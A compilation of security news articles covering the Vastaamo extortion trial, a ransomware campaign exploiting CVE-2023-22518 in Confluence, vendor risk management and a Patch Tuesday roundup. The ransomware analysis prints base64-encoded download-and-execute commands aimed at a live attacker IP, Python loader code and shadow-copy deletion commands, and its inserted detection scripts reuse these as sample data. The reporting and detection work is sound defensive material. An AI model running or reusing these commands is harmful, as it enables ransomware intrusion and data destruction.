Alleged Extortioner of Psychotherapy Patients Faces Trial

Prosecutors in Finland this week commenced their criminal trial against Julius Kivimäki, a 26-year-old Finnish man charged with extorting a once popular and now-bankrupt online psychotherapy practice and thousands of its patients. In a 2,200-page report, Finnish authorities laid out how they connected the extortion spree to Kivimäki, a notorious hacker who was convicted in 2015 of perpetrating tens of thousands of cybercrimes, including data breaches, payment fraud, operating a botnet and calling in bomb threats.

In November 2022, Kivimäki was charged with attempting to extort money from the Vastaamo Psychotherapy Center. In that breach, which occurred in October 2020, a hacker using the handle “Ransom Man” threatened to publish patient psychotherapy notes if Vastaamo did not pay a six-figure ransom demand.

Vastaamo refused, so Ransom Man shifted to extorting individual patients — sending them targeted emails threatening to publish their therapy notes unless paid a 500-euro ransom. When Ransom Man found little success extorting patients directly, they uploaded to the dark web a large compressed file containing all of the stolen Vastaamo patient records.

Security experts soon discovered Ransom Man had mistakenly included an entire copy of their home folder, where investigators found many clues pointing to Kivimäki’s involvement. By that time, Kivimäki was no longer in Finland, but the Finnish government nevertheless charged Kivimäki in absentia with the Vastaamo hack. The 2,200-page evidence document against Kivimäki suggests he enjoyed a lavish lifestyle while on the lam, frequenting luxury resorts and renting fabulously expensive cars and living quarters.

But in February 2023, Kivimäki was arrested in France after authorities there responded to a domestic disturbance call and found the defendant sleeping off a hangover on the couch of a woman he’d met the night before. The French police grew suspicious when the 6′ 3″ blonde, green-eyed man presented an ID that stated he was of Romanian nationality.

A redacted copy of an ID Kivimaki gave to French authorities claiming he was from Romania.

Finnish prosecutors showed that Kivimäki’s credit card had been used to pay for the virtual server that hosted the stolen Vastaamo patient notes. What’s more, the home folder included in the Vastaamo patient data archive also allowed investigators to peer into other cybercrime projects of the accused, including domains that Ransom Man had access to as well as a lengthy history of commands he’d executed on the rented virtual server.

Some of those domains allegedly administered by Kivimäki were set up to smear the reputations of different companies and individuals. One of those was a website that claimed to have been authored by a person who headed up IT infrastructure for a major bank in Norway which discussed the idea of legalizing child sexual abuse.

Another domain hosted a fake blog that besmirched the reputation of a Tulsa, Okla. man whose name was attached to blog posts about supporting the “white pride” movement and calling for a pardon of the Oklahoma City bomber Timothy McVeigh.

Kivimäki appears to have sought to sully the name of this reporter as well. The 2,200-page document shows that Kivimäki owned and operated the domain krebsonsecurity[.]org, which hosted various hacking tools that Kivimäki allegedly used, including programs for mass-scanning the Internet for systems vulnerable to known security flaws, as well as scripts for cracking database server usernames and passwords, and downloading databases.

Ransom Man inadvertently included a copy of his home directory in the leaked Vastaamo patient data. A lengthy history of the commands run by that user shows they used krebsonsecurity-dot-org to host hacking and scanning tools.

Mikko Hyppönen, chief research officer at WithSecure (formerly F-Secure), said the Finnish authorities have done “amazing work,” and that “it’s rare to have this much evidence for a cybercrime case.”

Petteri Järvinen is a respected IT expert and author who has been following the trial, and he said the prosecution’s case so far has been strong.

“The National Bureau of Investigation has done a good job and Mr Kivimäki for his part some elementary mistakes,” Järvinen wrote on LinkedIn. “This sends an important message: online crime does not pay. Traces are left in the digital world too, even if it is very tedious for the police to collect them from servers all around the world.”

Antti Kurittu is an information security specialist and a former criminal investigator. In 2013, Kurittu worked on an investigation involving Kivimäki’s use of the Zbot botnet, among other activities Kivimäki engaged in as a member of the hacker group Hack the Planet (HTP). Kurittu said it remains to be seen if the prosecution can make their case, and if the defense has any answers to all of the evidence presented.

“Based on the public pretrial investigation report, it looks like the case has a lot of details that seem very improbable to be coincidental,” Kurittu told KrebsOnSecurity. “For example, a full copy of the Vastaamo patient database was found on a server that belonged to Scanifi, a company with no reasonable business that Kivimäki was affiliated with. The leaked home folder contents were also connected to Kivimäki and were found on servers that were under his control.”

The Finnish daily yle.fi reports that Kivimäki’s lawyers sought to have their client released from confinement for the remainder of his trial, noting that the defendant has already been detained for eight months.

The court denied that request, saying the defendant was still a flight risk. Kivimäki’s trial is expected to continue until February 2024, in part to accommodate testimony from a large number of victims. Prosecutors are seeking a seven-year sentence for Kivimäki.

C3RB3R Ransomware | Ongoing Exploitation of CVE-2023-22518 Targets Unpatched Confluence Servers 

SentinelOne is currently monitoring increased exploitation of CVE-2023-22518, a recently identified vulnerability in Atlassian’s Confluence Datacenter and Server software. We have observed multiple campaigns leveraging the bug to deploy new C3RB3R (Cerber) ransomware variants targeting both Windows and Linux hosts.

In this post, we detail the attack chain observed in these incidents and provide recent indicators to help responders and threat hunters identify and mitigate similar attacks in these ongoing campaigns.

Background

CVE-2023-22518 is an improper authorization vulnerability in all versions of Atlassian’s Confluence Data Center and Server which allows an unauthenticated remote attacker to create a backdoor administrator account on an exposed Confluence instance. The remote attacker can then use the backdoor account to perform unauthorized actions.

First disclosed on October 31, 2023, CVE-2023-22518 was subsequently updated from CVSS score 9.1 to 10 on November 6, after further reports of active in-the-wild exploits and related ransomware incidents.

According to Atlassian’s notice, the following Confluence Data Center and Server versions, along with any software created before the earliest listed version, are vulnerable to this issue and at critical risk:

  • Version 7.19.16
  • Version 8.3.4
  • Version 8.4.4
  • Version 8.5.3
  • Version 8.6.1

When running a Shodan search using the hash value query http.favicon.hash:-305179312, we observed over 5,000 vulnerable environments.

Shodan results for Confluence instances exposed to CVE-2023-22518

Cerber ransomware has existed in various phases since 2016. It has operated as a semi-private RaaS since at least 2020 and saw a spike in usage through 2021 and 2022. Cerber payloads exist for both Linux and Windows. More recent payloads, associated with this campaign and others, display the “C3RB3R” branding. This is visible in the ransom note as well as on the victim payment portal.

Excerpt from a C3RB3R ransom note

C3RB3R Ransomware Payload Delivery

As noted above, CVE-2023-22518 is an ‘Improper Authorization’ vulnerability, which allows for the Confluence instance to be reset, followed by the attacker being able to create an administrative account and thus obtain full control of the system.

Initial compromise is achieved via a specially crafted HTTP POST request directed at the exposed Confluence instance. These requests target the setup-restore.action endpoint, activity which can be observed in the access logs (example from Atlassian):

[02/Nov/2023:19:40:01 +0530] - http-nio-8090-exec-1 127.0.0.1 POST /json/setup-restore.action HTTP/1.1 403 46ms 1198 http://YOURSERVERHOST/login.action?os_destination=%2Findex.action&permissionViolation=true Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
[02/Nov/2023:19:40:08 +0530] - http-nio-8090-exec-4 127.0.0.1 POST /json/setup-restore.action?synchronous=false HTTP/1.1 302 78ms - http://YOURSERVERHOST/json/setup-restore.action Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
[02/Nov/2023:19:40:09 +0530] - http-nio-8090-exec-3 127.0.0.1 GET /json/setup-restore-progress.action?taskId=5a7af4cd-698d-4e3d-8bd4-a411c779d519 HTTP/1.1 200 24ms 277 http://YOURSERVERHOST/json/setup-restore.action Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
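As an added example (not code from SentinelOne’s post or from Atlassian), the Python below parses access-log lines in the layout quoted above and flags requests to the restore endpoints, so a responder can triage a log export quickly. The embedded sample reuses Atlassian’s three lines plus two constructed benign ones; treating a 302 on the restore POST as "accepted" and a 403 as "refused" is an assumption drawn from that sample.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Confluence access-log layout as in the Atlassian excerpt:
# [timestamp] - thread client-ip METHOD target PROTO status <n>ms bytes referer user-agent
LOG_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] - (?P<thread>\S+) (?P<ip>\S+) (?P<method>[A-Z]+) "
    r"(?P<target>\S+) HTTP/\d\.\d (?P<status>\d{3}) (?P<duration>\d+)ms "
    r"(?P<bytes>\S+) (?P<referer>\S+) (?P<ua>.*)$"
)

# Endpoints named in the log excerpt as touched during exploitation.
RESTORE_ENDPOINT = "/json/setup-restore.action"
PROGRESS_ENDPOINT = "/json/setup-restore-progress.action"


@dataclass
class Finding:
    ts: str
    ip: str
    method: str
    path: str
    status: int
    severity: str
    reason: str


def parse_line(line: str) -> Optional[dict]:
    """Split one access-log line into fields; None if the line does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["target"].split("?", 1)[0]  # drop the query string
    return rec


def classify(rec: dict) -> Optional[Finding]:
    """Map a parsed request onto a finding; None for anything off the restore path."""
    path, method, status = rec["path"], rec["method"], rec["status"]
    if path == RESTORE_ENDPOINT and method == "POST":
        # Assumption: a 302 on the restore POST (the page's second sample line)
        # means the server accepted the restore; a 403 means it was refused.
        if status == 302:
            return Finding(rec["ts"], rec["ip"], method, path, status, "high",
                           "setup-restore POST accepted (possible instance reset)")
        return Finding(rec["ts"], rec["ip"], method, path, status, "medium",
                       "setup-restore POST attempted, server answered %d" % status)
    if path == PROGRESS_ENDPOINT:
        return Finding(rec["ts"], rec["ip"], method, path, status, "low",
                       "restore-progress poll; usually follows a restore attempt")
    return None


def scan(log_text: str) -> List[Finding]:
    """Return every restore-related request in a block of access-log text, in order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # unparsable line; a production pipeline should count these
        f = classify(rec)
        if f:
            findings.append(f)
    return findings


# Constructed sample: Atlassian's three lines bracketed by two benign requests.
SAMPLE_LOG = """\
[02/Nov/2023:19:39:55 +0530] - http-nio-8090-exec-2 10.0.0.7 GET /login.action HTTP/1.1 200 12ms 5120 - Mozilla/5.0 (X11; Linux x86_64)
[02/Nov/2023:19:40:01 +0530] - http-nio-8090-exec-1 127.0.0.1 POST /json/setup-restore.action HTTP/1.1 403 46ms 1198 http://YOURSERVERHOST/login.action?os_destination=%2Findex.action&permissionViolation=true Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
[02/Nov/2023:19:40:08 +0530] - http-nio-8090-exec-4 127.0.0.1 POST /json/setup-restore.action?synchronous=false HTTP/1.1 302 78ms - http://YOURSERVERHOST/json/setup-restore.action Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
[02/Nov/2023:19:40:09 +0530] - http-nio-8090-exec-3 127.0.0.1 GET /json/setup-restore-progress.action?taskId=5a7af4cd-698d-4e3d-8bd4-a411c779d519 HTTP/1.1 200 24ms 277 http://YOURSERVERHOST/json/setup-restore.action Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
[02/Nov/2023:19:41:30 +0530] - http-nio-8090-exec-5 10.0.0.7 GET /rest/api/content HTTP/1.1 200 30ms 2048 - curl/8.0
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f.severity.upper(), f.ts, f.ip, f.method, f.path, f.status, "-", f.reason)
```

Behind a reverse proxy the recorded client IP is the proxy’s (127.0.0.1 in the sample), so correlate the timestamps with the proxy’s own logs to recover the true source.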

Once the attacker has established an administrative account on the instance, they are able to execute further commands; in this case the next stage was a set of scripts that download, decode and execute the appropriate payload. Execution of these scripts is handled through a compatible webshell. Atlassian notes the use of a malicious plugin named web.shell.Plugin.

Atlassian’s advisory listing web.shell.Plugin as an indicator

The appearance of the malicious plugin has been noted in Atlassian’s community forum.

Atlassian community posting on the appearance of a malicious webshell

Threat actors then deploy PowerShell scripts to identify whether or not to use an available proxy server for the Confluence server communications. Depending on the needs, different download methods are provided for the next stage payloads.

Download_Execute PowerShell function

The following IP addresses were used by threat actors to download the C3RB3R ransomware payloads:

45.145[.]6.112
193.43.72[.]11
193.176.179[.]41

These remote servers were observed hosting both Linux and Windows versions of C3RB3R payloads.

The initial set of payloads were stored on the C2 (not reachable as of this writing) under inconspicuous names. For example:

  • “agae”
  • “mdrg”
  • “tmp.1u.txt”
  • “tmp.5p.txt”
  • “tmp32.txt”
  • “tmp37.txt”
  • “tmp37”
  • “tmp48.txt”

Linux Infection Details

Upon targeting CVE-2023-22518, the parent process of Confluence (in this case, Java) will be used for command injection. Upon compromise, we observed the following command being executed to download and spawn the later stage components, ultimately leading to C3RB3R execution.

sh -c echo -n ZWNobyAtbiBodHRwOi8vMTkzLjE3Ni4xNzkuNDEvYWdhZSA+IC90bXAvbHJ1 | base64 -d | sh

The base64 encoded command above decodes to:

echo -n http[:]//193[.]176.179.41/agae > /tmp/lru

The /tmp/lru file contains a dictionary of download URLs that correspond to different architectures.

The following command begins the download and execution of the next stage of the attack, which results in the spawning of further commands, depending on the version of Python available on the host.

sh -c echo -n
aW1wb3J0IG9zLHN5cyxiYXNlNjQKaWYgc3lzLnZlcnNpb25faW5mby5tYWpvciA9PSAzOgoJaW1wb3J0IHVybGxpYi5yZXF1ZXN0IGFzIHUKCXAgPSAiMyIKZWxzZToKCWltcG9ydCB1cmxsaWIyIGFzIHUKCXAgPSAiMiIKaCA9ICcvdG1wL2xydScKdHJ5OgoJZm9yIGwgaW4gb3BlbihoKToKCQlyID0gdS51cmxvcGVuKGwrJy5zcCcpCgkJcDIgPSBiYXNlNjQuYjY0ZGVjb2RlKHIucmVhZCgpKS5kZWNvZGUoInV0Zi04IikKCQlyLmNsb3NlKCkKCQlvcy5zeXN0ZW0oInB5dGhvbiIrcCsiIC1jIFwiIitwMisiXCIgfHwgcHl0aG9uIC1jIFwiIitwMisiXCIgJiIpCmV4Y2VwdDoKCXBhc3MK 
| base64 -d | python2 || echo -n
aW1wb3J0IG9zLHN5cyxiYXNlNjQKaWYgc3lzLnZlcnNpb25faW5mby5tYWpvciA9PSAzOgoJaW1wb3J0IHVybGxpYi5yZXF1ZXN0IGFzIHUKCXAgPSAiMyIKZWxzZToKCWltcG9ydCB1cmxsaWIyIGFzIHUKCXAgPSAiMiIKaCA9ICcvdG1wL2xydScKdHJ5OgoJZm9yIGwgaW4gb3BlbihoKToKCQlyID0gdS51cmxvcGVuKGwrJy5zcCcpCgkJcDIgPSBiYXNlNjQuYjY0ZGVjb2RlKHIucmVhZCgpKS5kZWNvZGUoInV0Zi04IikKCQlyLmNsb3NlKCkKCQlvcy5zeXN0ZW0oInB5dGhvbiIrcCsiIC1jIFwiIitwMisiXCIgfHwgcHl0aG9uIC1jIFwiIitwMisiXCIgJiIpCmV4Y2VwdDoKCXBhc3MK 
| base64 -d | python3

Decoded, these scripts resemble the following output:

Decoded C3RB3R execution script

These Python scripts are responsible for downloading an appropriate version of qnetd, which in turn downloads and executes the final C3RB3R malware payload.

Ransomware Payload Behavior (Windows)

The Windows versions of C3RB3R are launched with the -b 9 argument, through a hidden window controlled via scripts on the remote C2. The ransomware will attempt to remove VSS (Volume Shadow Copies) via WMIC.EXE for each identified shadow copy. For example:

cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{xxxx392B-3896-49EE-8B43-0233022xxxxx}'" delete
cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{xxxx993A-B10A-4650-A272-5E11743xxxxx}'" delete
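The Linux stage described above (a base64 blob piped into `base64 -d | sh`, or into `python2`/`python3` in the second command) and the Windows shadow-copy deletion just shown leave two distinct fingerprints in process telemetry. As an added example (not code from SentinelOne’s post), the Python below runs both checks over constructed EDR-style events, decoding the blob so an analyst sees the plain command and scoring it higher when it fetches a URL, writes under /tmp, or was spawned by the Java web process; the two malicious command lines are the ones quoted on the page, the hostnames and parent names are made up.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# "echo <b64> | base64 -d | <interpreter>"; also matches the python2/python3 variant.
B64_PIPE_RE = re.compile(
    r"echo\s+(?:-n\s+)?([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)"
    r"\s*\|\s*(sh|bash|python[23]?)\b"
)
# WMIC shadow-copy deletion as issued by the Windows payload before encryption.
WMIC_SHADOW_RE = re.compile(r"wmic(?:\.exe)?\s+shadowcopy\b.*\bdelete\b", re.IGNORECASE)
# Parents that have no business spawning shells on a Confluence host (assumed names).
WEB_PARENTS = {"java", "tomcat"}


@dataclass
class ProcEvent:
    host: str
    parent: str   # parent process image name
    cmdline: str  # full command line as recorded by EDR, auditd or Sysmon


@dataclass
class Alert:
    host: str
    rule: str
    severity: str
    detail: str


def decode_b64(blob: str) -> Optional[str]:
    """Strictly decode a base64 blob; None if it is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def check_encoded_shell(ev: ProcEvent) -> Optional[Alert]:
    """Flag inline base64 handed to a shell or Python interpreter."""
    m = B64_PIPE_RE.search(ev.cmdline)
    if not m:
        return None
    decoded = decode_b64(m.group(1))
    if decoded is None:
        return None
    signs = []
    if re.search(r"https?://", decoded):
        signs.append("remote URL")
    if "/tmp/" in decoded:
        signs.append("writes under /tmp")
    if ev.parent.lower() in WEB_PARENTS:
        signs.append("spawned by %s" % ev.parent)
    severity = "high" if signs else "medium"
    detail = "decoded: %r" % decoded
    if signs:
        detail += " [" + "; ".join(signs) + "]"
    return Alert(ev.host, "encoded-shell-pipe", severity, detail)


def check_shadowcopy_delete(ev: ProcEvent) -> Optional[Alert]:
    """Flag WMIC shadow-copy deletion, a common pre-encryption step."""
    if WMIC_SHADOW_RE.search(ev.cmdline):
        return Alert(ev.host, "shadowcopy-delete", "high", ev.cmdline)
    return None


CHECKS = (check_encoded_shell, check_shadowcopy_delete)


def scan_events(events: List[ProcEvent]) -> List[Alert]:
    """Run every check over every event; alerts come back in event order."""
    alerts = []
    for ev in events:
        for check in CHECKS:
            alert = check(ev)
            if alert:
                alerts.append(alert)
    return alerts


# Constructed sample telemetry; hosts and parents are made up, the two
# malicious command lines are those quoted in the post.
SAMPLE_EVENTS = [
    ProcEvent("confluence-01", "java",
              "sh -c echo -n ZWNobyAtbiBodHRwOi8vMTkzLjE3Ni4xNzkuNDEvYWdhZSA+IC90bXAvbHJ1 | base64 -d | sh"),
    ProcEvent("confluence-01", "bash", "ls -la /var/log"),
    ProcEvent("build-02", "bash", "sh -c echo -n aGVsbG8gd29ybGQ= | base64 -d | sh"),
    ProcEvent("fileserver-03", "cmd.exe",
              r'''cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{xxxx392B-3896-49EE-8B43-0233022xxxxx}'" delete'''),
]

if __name__ == "__main__":
    for a in scan_events(SAMPLE_EVENTS):
        print(a.host, a.rule, a.severity.upper(), a.detail)
```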

The ransomware will traverse (and encrypt) local drive volumes as well as connected and accessible SMB shares. Encrypted files are modified with the .L0CK3D extension.

Ransom Note

The ransom note is written as read-me3.txt. Victims are given a unique Tor-based portal URL. In these specific campaigns, all victims are directed to:

j3qxmk6g5sk3zw62i2yhjnwmhm55rfz47fdyfkhaithlpelfjdokdxad[.]onion

C3RB3R Ransom Note

Victims are warned that data has been both encrypted and exfiltrated, and that failure to pay will result in the threat actors selling the stolen data on the dark web. Directions are given on how to purchase the C3RB3R decryptor via bitcoin.

C3RB3R Decryptor Page

SentinelOne Protects Against Cerber Ransomware

SentinelOne customers are protected against Cerber ransomware. The SentinelOne Singularity™ detects and prevents malicious behavior and artifacts associated with C3RB3R (Cerber) ransomware campaigns.

SentinelOne Detection C3RB3R (Windows)

Conclusion

Threat actors continue to explore vulnerabilities in collaboration and enablement platforms as a means of initial access. Atlassian Confluence is the latest platform being exploited by threat actors in this manner, and teams defending exposed environments are urged to take appropriate measures to ensure protection. A patch for CVE-2023-22518 is available and Atlassian has provided guidance on temporary mitigations for those that are unable to patch immediately.

Beyond the vendor’s guidance, strong endpoint security controls are required to protect against such ransomware payloads. We assess that these campaigns are ongoing and that further attacks targeting unprotected hosts accessible through vulnerable Confluence instances are highly likely.

To learn about how SentinelOne can help protect the devices in your fleet from ransomware and other threats, contact us or request a free demo.

Indicators of Compromise

Executables (SHA1)

Network Communications


Hidden Vulnerabilities | Effective Third-Party Risk Management in the Age of Supply Chain Attacks

A recent study reported that most organizations partner with an average of ten third-party vendors to help them manage and grow their operations. Researchers also noted that a glaringly high 98% of organizations were found to have existing vendor relationships with at least one third-party that has experienced a breach in the last two years.

A breach in one vendor’s network can serve as a gateway to compromising the rest of the supply chain, but how can a business effectively manage risks coming from vendors over which they have no operational control? In this post, we explore how to build a third-party risk management program and offer guidance on best practices for responding to a breach in a vendor partner.

A Brief History of Software Supply Chain Attacks

Digital supply chain attacks represent a strategic shift for cybercriminals, offering a pathway to compromise multiple organizations through a single, often unsuspecting, point of entry. By infiltrating suppliers’ networks, adversaries can inject malicious code, compromise data integrity, and even manipulate physical processes in manufacturing and distribution. Attacks using this approach have risen in the last five or six years as evidenced by a number of high-profile incidents such as:

  • NotPetya (2017) – malware entered systems through the compromised update process of Ukrainian accounting software, MeDoc. Initially disguised as ransomware, it was later revealed to be a destructive wiper malware, causing widespread disruption globally. Its impact was particularly severe due to its ability to spread rapidly across networks.
  • BitPay/Copay (2018) – Attackers compromised the Copay wallet software supply chain, injecting malicious code that enabled them to steal cryptocurrency. The breach highlighted the vulnerability of cryptocurrency wallets, impacting users who unknowingly installed the compromised software.
  • ShadowHammer (2019) – A sophisticated attack targeted the update process of ASUS Live Update Utility, compromising its distribution channel. Millions of users unknowingly downloaded a malicious version, allowing attackers to conduct targeted espionage. The attack was serious due to its widespread scope and the potential for espionage on a massive scale.
  • SolarWinds (2020) – A highly sophisticated supply chain attack compromised the update mechanism of SolarWinds’ Orion software, impacting major organizations and government agencies. The attackers gained unauthorized access, posing a severe threat to national security by compromising critical systems and sensitive data.
  • Kaseya (2021) – Exploiting a vulnerability in the Kaseya VSA software, REvil launched a ransomware attack that affected numerous managed service providers (MSPs) and their clients. This incident demonstrated the potential for cascading effects, impacting a large number of organizations through a single supply chain compromise.
  • International Committee of the Red Cross (2022) – A cyber espionage group compromised the update mechanism of the ICRC’s software. The attack posed significant risks due to the sensitivity of the organization’s operations and the potential compromise of confidential humanitarian data.
  • SmoothOperator (2023) – A supply chain attack attributed to North Korean-aligned threat actors on 3CX, a VoIP phone software supplier, involved the insertion of malicious code into software updates. The compromised updates affected numerous downstream clients. 3CX claims to have 600,000 customer companies across a broad range of industry verticals including automotive, hospitality, MSPs and Manufacturing.

Two main factors contribute to the increasing prevalence of digital supply chain attacks. Firstly, the growing complexity and interconnectivity of supply chains provide a broader attack surface for adversaries to exploit. Secondly, the reliance on digital technologies and the adoption of Industry 4.0 practices introduce new vulnerabilities. Smart manufacturing, IoT devices, and cloud-based systems, while enhancing operational efficiency, have all created new potential avenues for exploitation.

For small to medium-sized businesses (SMBs), the supply chain ecosystem often involves smaller vendors with limited cybersecurity resources, making them attractive targets for attackers seeking a foothold into larger enterprises. This interconnected web of dependencies, combined with the evolving sophistication of cyber threats, creates a perfect storm for the proliferation of supply chain attacks.

Storing Up Trouble for the Future | Data Breaches & Leaks

A major concern after a compromise of a third-party vendor is the potential misuse of data acquired from the breach. This ill-gotten information can become a potential tool for future malicious activities, ranging from identity theft and fraud to account abuse and external account takeover attacks. A third-party might be compromised while hosting a company’s data, or attackers may initially target the third party and then leverage that access to breach the target organization’s IT systems.

In the case of the 3CX attack, security researchers found that data stolen in an older cyberattack on a different software firm was then used to launch the attack on 3CX. Given the intricate degree of connection between global vendors, it is likely that 3CX was not the only company compromised through the earlier attack.

Building a Third-Party Risk Management (TPRM) Program

Based on the latest findings from the Ponemon Institute, third-party-based cyber attacks have increased from 44% to 49% year over year with key reasons including:

  • Low rates of access governance and visibility control implementation at the organizational level via identity and access management tools
  • Overprivileged vendor accounts and lack of zero-trust policies implemented at the network level
  • Lack of continuous monitoring of third-party access to network resources and critical data

Establishing a robust Third-Party Risk Management (TPRM) Program is essential for business leaders to safeguard their organizations from the potential risks introduced by their external partners.

The following questionnaire can be used as a guideline to get started:

Establish a Standard Vendor Assessment Process

  • What base contractual obligations outlining security responsibilities are required for the industry and business?
  • What due diligence practices, including the evaluation of the vendors’ cybersecurity measures, regulatory compliance, and overall risk posture, are in place?
  • What cybersecurity frameworks are required for the third-party vendor? Are they fully compliant with those frameworks, and have they been audited to ensure compliance with regulatory requirements?
  • Does the vendor have a history of suffering data breaches?
  • What laws are in place within the vendor’s country that require them to disclose data or other important information?

Get to Know Your Vendor’s Cybersecurity Strategies

  • What is the level of sensitivity of the data or services the vendor is expected to handle?
  • Is the vendor able to provide the required industry standard security certifications?
  • Does the vendor have cybersecurity insurance?
  • Does the vendor’s tool stack and system support single-sign on (SSO)?
  • What types of data will the vendor’s system or service be storing, processing, and/or accessing?

Establish All Contractual Security Expectations & Requirements

  • What cybersecurity service level agreements (SLAs) are needed for the partnership?
  • What current security risks does the vendor face, or foresee itself facing in the near future? What solutions or processes are in place to mitigate these risks?
  • What security measures are currently in place to fulfill capabilities like continuous monitoring, breach alerts/notifications, endpoint/cloud/identity security, data access, etc.?

What To Do If Your Third-Party Vendor Is Compromised

In the event that a third-party vendor is under active cyberattack or has found evidence of breach, business leaders and security teams can use the below checklist to act quickly and contain the potential fallout.

1 – Containment, Remediation & Documentation

Activate the incident response plan (IRP) immediately. This involves isolating the compromised systems, containing the breach, and assessing the extent of the damage. At the same time, establish secure communication lines with the affected vendor to collect any crucial insights or details into the nature of the attack, what potential data was compromised, and any details on pathways exploited by the cyber attackers. To do so, interview those who first discovered the breach and document the investigative process.

2 – Forensic Investigation & PR Communications

Forensic investigations play a critical role in uncovering the origins and methods of the cyberattack. Engaging cybersecurity experts to conduct a thorough analysis can help determine the extent of the compromise, identify the specific tactics used by the attackers, and provide valuable insights to fortify defenses against similar threats in the future.

Initiate any public relations and external communications strategy to provide transparent and timely communication with relevant authorities, customers, stakeholders, and the public to maintain trust and credibility. Craft clear and accurate messages that outline the incident, the steps taken to address it, and the measures implemented to prevent future occurrences.

3 – Thorough Reviews & Intel Sharing

Collaboration and transparency are crucial in this phase. All affected parties can mutually benefit from sharing threat intelligence and agreeing on next steps to remediate the vulnerabilities that led to the breach. Simultaneously, organizations should initiate a thorough review of their own systems to assess whether the breach has cascaded into their networks, and if so, take immediate steps to address and neutralize the threat.

4 – Lessons Learned, Audits & Continuous Improvement

Post-incident, a rigorous evaluation of the vendor’s cybersecurity practices can help prevent future attacks. This includes a reassessment of the vendor’s security protocols, risk management strategies, and overall cybersecurity hygiene. A thorough audit will help determine the effectiveness of the vendor’s response to the incident and ensure that appropriate measures are in place to prevent a recurrence.

As part of the ongoing cybersecurity strategy, organizations can prioritize continuous monitoring and assessment of their third-party vendors. This involves regularly scrutinizing the security posture of vendors, ensuring compliance with established security standards, and staying vigilant for emerging threats. Establishing a robust vendor risk management program that includes periodic security assessments, penetration testing, and vulnerability scanning helps maintain a proactive posture going forward.

Ultimately, the key to navigating the aftermath of a third-party vendor cyber compromise lies in a combination of rapid response, open communication, collaborative remediation efforts, and a commitment to ongoing vigilance and risk management.

Conclusion

Given the amount of sensitive data and assets organizations share with their third-party vendors, any attacks they face can reverberate through the entire network and set off a chain reaction. Global reliance on third-party vendors in the business landscape comes with a set of inherent cyber risks that organizations across all industries must grapple with. These risks stem from the closely-connected nature of supply chains, where vendors often have access to sensitive data and systems.

To safeguard organizations from third-party related cyber risks, C-level executives and security leaders continue to rely on autonomous, AI-driven cybersecurity platforms like SentinelOne for all-around protection. Learn how SentinelOne’s Singularity™ XDR defends across all possible attack surfaces by contacting us today or booking a demo.


Microsoft Patch Tuesday, November 2023 Edition

Microsoft today released updates to fix more than five dozen security holes in its Windows operating systems and related software, including three “zero day” vulnerabilities that Microsoft warns are already being exploited in active attacks.

The zero-day threats targeting Microsoft this month include CVE-2023-36025, a weakness that allows malicious content to bypass the Windows SmartScreen Security feature. SmartScreen is a built-in Windows component that tries to detect and block malicious websites and files. Microsoft’s security advisory for this flaw says attackers could exploit it by getting a Windows user to click on a booby-trapped link to a shortcut file.

Kevin Breen, senior director of threat research at Immersive Labs, said emails with .url attachments or logs with processes spawning from .url files “should be a high priority for threat hunters given the active exploitation of this vulnerability in the wild.”

The second zero day this month is CVE-2023-36033, which is a vulnerability in the “DWM Core Library” in Microsoft Windows that was exploited in the wild as a zero day and publicly disclosed prior to patches being available. It affects Microsoft Windows 10 and later, as well as Microsoft Windows Server 2019 and subsequent versions.

“This vulnerability can be exploited locally, with low complexity and without needing high-level privileges or user interaction,” said Mike Walters, president and co-founder of the security firm Action1. “Attackers exploiting this flaw could gain SYSTEM privileges, making it an efficient method for escalating privileges, especially after initial access through methods like phishing.”

The final zero day in this month’s Patch Tuesday is a problem in the “Windows Cloud Files Mini Filter Driver” tracked as CVE-2023-36036 that affects Windows 10 and later, as well as Windows Server 2008 and later. Microsoft says it is relatively straightforward for attackers to exploit CVE-2023-36036 as a way to elevate their privileges on a compromised PC.

Beyond the zero day flaws, Breen said organizations running Microsoft Exchange Server should prioritize several new Exchange patches, including CVE-2023-36439, which is a bug that would allow attackers to install malicious software on an Exchange server. This weakness technically requires the attacker to be authenticated to the target’s local network, but Breen notes that a pair of phished Exchange credentials will provide that access nicely.

“This is typically achieved through social engineering attacks with spear phishing to gain initial access to a host before searching for other vulnerable internal targets – just because your Exchange Server doesn’t have internet-facing authentication doesn’t mean it’s protected,” Breen said.

Breen said this vulnerability goes hand in hand with three other Exchange bugs that Microsoft designated as “exploitation more likely:” CVE-2023-36050, CVE-2023-36039 and CVE-2023-36035.

Finally, the SANS Internet Storm Center points to two additional bugs patched by Microsoft this month that aren’t yet showing signs of active exploitation but that were made public prior to today and thus deserve prioritization. Those include: CVE-2023-36038, a denial of service vulnerability in ASP.NET Core, with a CVSS score of 8.2; and CVE-2023-36413: A Microsoft Office security feature bypass. Exploiting this vulnerability will bypass the protected mode when opening a file received via the web.

